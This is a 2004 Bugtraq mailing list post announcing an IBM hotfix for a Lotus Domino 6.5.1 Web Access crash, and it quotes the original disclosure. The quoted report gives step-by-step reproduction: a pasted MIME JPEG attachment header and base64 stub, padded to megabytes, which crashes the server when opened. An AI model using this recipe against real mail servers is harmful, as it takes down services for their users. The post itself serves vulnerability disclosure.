Bugtraq mailing list archives
Re: DoS against Domino 6.5.1
From: Andreas Klein <Andreas.C.Klein () physik uni-wuerzburg de>
Date: Fri, 23 Jul 2004 20:34:46 +0200 (CEST)
Hello, IBM changed his mind and a hotfix that solves the problem is available. After installing the fix the server does not crash anymore when opening a message formatted as described below. Accessing the mail with IE on Windows leads to a browser hang. You have to terminate the browser with the task-manager, but I think this is not a big problem, since the server keeps on running and you can access all other mails in you box and the problem normally occurs only when opening malformatted mails. -- original problem report -- On Wed, 30 Jun 2004, Andreas Klein wrote:
Hello, this problem has been reported to IBM Lotus customer support (PMR 37321,999,724) on Feb 16, 2004 and was reproduced by them. Affected versions: Domino 6.5.1 and newer on Linux (other platforms not tested by me, but Domino 6.5.1 on Windows has been found to be vulnerable too by IBM support) Abstract: Opening certain mails via Domino Web Access leads to a crash of the whole Domino-server. Detailed description: Open your favourite mail-program (eg. pine) and write a message to a person reading his mail via Domino Web Access (formerly known as iNotes) with the following message content: (just paste all the lines below into the body of the mail) --- snip here; do not paste this line -- Content-Disposition: Attachment; filename="PC210017.JPG" Content-Type: image/jpeg; Name="PC210017.JPG" Content-Transfer-Encoding: Base64 /9j/4Re0RXhpZgAASUkqAAgAAAALAA4BAgAgAAAAkgAAAA8BAgAYAAAAsgAAABABAgAMAAAA ygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgBAwABAAAAAgAAADEB AgAJAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEAAAADAABPTFlN [Add here some megabytes of data. 1kB is not enough, but 12MB was sufficient in all my tests] --- snip here; do not pste this line --- As soon as the recipient opens the mail in Domino Web Access, the whole Domino server will go down. Solution: There is no solution provided by IBM and they are not planning to fix the problem. The proposed workaround is to limit the maximum message-size or to disable the web-access.
-- Andreas Klein asklein () cip physik uni-wuerzburg de root / webmaster @cip.physik.uni-wuerzburg.de root / webmaster @www.physik.uni-wuerzburg.de _____________________________________ | | | Long live our gracious AMIGA! | |___________________________________|
Current thread:
- DoS against Domino 6.5.1 Andreas Klein (Jul 01)
- Re: DoS against Domino 6.5.1 Andreas Klein (Jul 24)